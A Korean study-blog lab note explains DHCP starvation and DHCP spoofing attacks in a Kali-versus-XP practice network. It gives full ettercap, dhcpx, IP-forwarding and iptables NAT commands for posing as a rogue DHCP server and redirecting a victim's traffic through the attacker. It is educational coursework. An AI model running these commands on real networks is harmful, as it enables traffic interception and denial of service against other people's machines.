본문 바로가기

INFOSEC/ NETWORK

DHCP Attack

 

1. 기본설정 (ip, nat, routing, dhcp서버) 설정

 


DHCP Attack

- DHCP Starvation → DHCP Server의 Pool을 모두 소모시키는 공격 → Dos Attack
- DHCP Spoofing → DHCP Client에게 조작된 네트워크 정보를 전달하는 공격

 

 

1. 단방향 

: 바깥세상 - (라우터) - 칼리 (게이트웨이) - xp 

 

xp <-> 인터넷 (ping 8.8.8.8) 소통할 때

xp 게이트웨이가 아닌

칼리 (공격자) 게이트웨이를 통해 정보전달. (spoofing : 훔쳐보는거)

 

DHCP spoofing  : 조작된 네트워크 정보 전달

 

kali:공격자]

위조된 네트워크 정보 전달 (DHCP 서버인척)

# ettercap -i eth0 -T  -M dhcp:10.10.90.190-200/255.255.255.0/168.126.63.1

gateway 는 자동으로 kali 의 주소를 사용한다.

 

xp → 바깥 으로 보내는 정보는 볼 수 있는데

(dhcp 서버 공격을 통해서, 주소를 못받게 하고있어서 

위의 명령어를 통해 DHCP서버인 척 하여 위조된 네트워크 정보를 전달할 수 있는 것.

게이트웨이 위치만 옮긴 것 !!)

 

바깥 → xp 로 오는 정보는 볼 수 없다. (바로 xp 주소로 전달해버리기 때문에.)

이 것까지 하기 위해선 밑의 NAT 과정이 필요. (현실적으론 매우 힘듦)

 

 


 

2. 양방향 (NAT 두 개 )

 

네트워크 인터페이스 추가

 

setting
eth1  클릭 > add profile
 ifconfig

 

라우팅이 가능하도록 설정

echo 1 > /proc/sys/net/ipv4/ip_forward

 

cat /proc/sys/net/ipv4/ip_forward

 

 

NAT 만들기

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -t nat -L

 

kali:공격자]

위조된 네트워크 정보 전달 (DHCP 서버인척)

 

# ettercap -i eth1 -T  -M dhcp:172.16.0.190-200/255.255.255.0/168.126.63.1

gateway 는 자동으로 kali 의 주소를 사용한다.

 

# dhcpx -i eth0 -D DHCP서버주소 -vv 

 

ettercap -i eth1 -T  -M dhcp: 172.16.0.190-200/255.255.255.0/168.126.63.1

 

dhcpx -i eth0 -D 10.10.23.147 -vv 

 


 

xp (클라이언트) ]

주소 다시 부여받기

ipconfig /release → /renew

172.대의 주소를 부여받아야함

GW:172.16.~~.kali

 

 

'INFOSEC > NETWORK' 카테고리의 다른 글

TCP Session Hijacking ) NetCat  (0) 2019.10.04
네트워크 보안 운영  (0) 2019.10.02
GNS - NAT 명령어  (0) 2019.10.02
DHCP  (0) 2019.09.27
IDS - Port Mirroring - SPAN 실습  (0) 2019.09.26